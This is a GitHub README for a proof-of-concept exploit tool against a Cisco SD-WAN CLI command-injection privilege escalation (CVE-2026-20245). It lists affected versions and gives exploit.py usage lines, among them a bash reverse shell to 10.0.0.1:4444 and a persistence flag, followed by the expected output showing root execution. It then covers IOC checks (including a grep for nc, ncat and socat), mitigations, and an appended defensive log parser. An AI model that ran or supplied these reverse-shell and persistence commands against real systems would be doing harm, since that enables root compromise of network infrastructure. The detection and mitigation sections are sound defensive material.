fevar54/CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit
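A PoC exploitation tool for the Cisco SD-WAN Controller CLI command-injection privilege escalation vulnerability (CVE-2026-20245), supporting vulnerability verification and privilege escalation testing.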
# CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit
## ⚠️ Warning
**This code is for educational and authorized security testing purposes only.**
## 📋 Description
CVE-2026-20245 is a **privilege escalation** vulnerability in the CLI of Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) and Cisco Catalyst SD-WAN Validator (vBond). An authenticated attacker with netadmin privileges can execute arbitrary commands as root by uploading a crafted file.
### Technical details
| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-20245 |
| **CVSS** | 7.8 (High) |
| **Vector** | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| **Component** | CLI / CSV upload |
| **Type** | Command injection (CWE-116) |
## 🎯 Affected versions
| Product | Vulnerable versions |
|----------|----------------------|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
### Specific affected versions:
- 20.9.x (all versions)
- 20.10.x - 20.12.5.3
- 20.12.6 - 20.12.6.1
- 20.12.7
- 20.13.x - 20.15.4.3
- 20.15.5 - 20.15.5.1
- 20.16.x - 20.18.2.1
## 🔧 Installation
```bash
# Clone the repository
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Install dependencies
pip install -r requirements.txt
# Make the script executable
chmod +x exploit.py
```
## 📦 Dependencies
```txt
requests>=2.31.0
```
## 🚀 Usage
### Check version
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
```
### Execute a command
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
```
### Reverse shell
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
```
### Install persistence
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
```
## 🔍 Expected output
```text
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
```
## 🔍 Indicators of Compromise (IOCs)
### Check the logs (/var/log/scripts.log)
```bash
# Search for suspicious activity
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
```
Specific commands to look for:
```text
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
```
### Suspicious files
- `/home/admin/*.csv` (unauthorized CSV files)
- `/tmp/*.csv`
- `/var/log/scripts.log` with unusual entries
### Processes
```bash
# Look for unusual root processes
ps aux | grep -E "bash|sh|nc|ncat|socat"
```
## 🛡️ Mitigation
### Option 1 - Upgrade to a fixed version (RECOMMENDED)
| Version | Fixed Release |
|----------|----------------------|
| 20.18.2.1 and earlier | 20.18.3.1 |
### Option 2 - Limit access
- Restrict administrative access to the management network
- Use multi-factor authentication
- Monitor CSV upload activity
### Option 3 - Secure configuration
```text
# Disable the upload of serial numbers if it is not needed
no feature upload-serial-numbers
# Restrict netadmin privileges
admin privilege restrict
```
## 📚 References
- Cisco Security Advisory
- [NVD - CVE-2026-20245](https://nvd.nist.gov/vuln/detail/CVE-2026-20245)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
## 📊 Timeline
| Date | Event |
|-------|-------|
| 2026-05-14 | Cisco publishes the initial advisory |
| 2026-06-04 | CVE officially published |
| 2026-06-09 | CISA adds it to KEV |
| 2026-06-23 | CISA deadline for patching |
## ⚖️ Disclaimer
This software is provided "as is", without warranties. The author is not responsible for misuse. Use it only on authorized systems.
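The log check from the IOC section, as an added example that is not part of the original repository: a small triage parser that pulls every `vScript` entry that runs an upload script or references a CSV file out of `/var/log/scripts.log` and marks the ones whose file sits in the directories listed under suspicious files. It assumes the log layout of the single entry quoted in this README; the `example_*` script names and every sample line except the first are constructed.

```python
import re
from typing import NamedTuple

# Layout assumed from the one scripts.log entry quoted in the README.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) vScript: "
    r"(?P<script>\S+)(?P<args>.*)$"
)
CSV_RE = re.compile(r"(\S+\.csv)\b", re.IGNORECASE)
# Directories the README lists as places to look for unauthorized CSV files.
WATCHED_DIRS = ("/home/admin/", "/tmp/")

class Hit(NamedTuple):
    timestamp: str
    host: str
    script: str
    csv_path: str
    watched_dir: bool

def find_csv_uploads(lines):
    """Return a Hit for each vScript entry that runs an upload script or names a CSV file."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a vScript entry
        script = m["script"].rsplit("/", 1)[-1]
        csv = CSV_RE.search(m["args"])
        if "upload" not in script and not csv:
            continue
        path = csv.group(1) if csv else ""
        hits.append(Hit(m["ts"], m["host"], script, path, path.startswith(WATCHED_DIRS)))
    return hits

# Constructed sample input: the first line is the entry quoted in the README,
# the remaining lines are made up for this example.
SAMPLE_LOG = """\
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Apr 15 09:45:10 vmanage vScript: /usr/bin/example_status_script.sh -cli
Apr 15 09:46:02 vmanage sshd[2211]: Accepted password for admin from 192.0.2.10
Apr 16 02:13:40 vmanage vScript: /usr/bin/example_import_script.sh -cli path /opt/data/list.CSV
""".splitlines()

if __name__ == "__main__":
    for h in find_csv_uploads(SAMPLE_LOG):
        flag = "REVIEW" if h.watched_dir else "info"
        print(f"[{flag}] {h.timestamp} {h.host} {h.script} {h.csv_path or '(no csv path)'}")
```

Each hit still needs to be correlated with who was logged in as netadmin at that timestamp and whether the upload was expected.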
Tags: Python, protocol analysis, security PoC, Cisco SD-WAN, no backdoor, privilege escalation, reverse engineering tools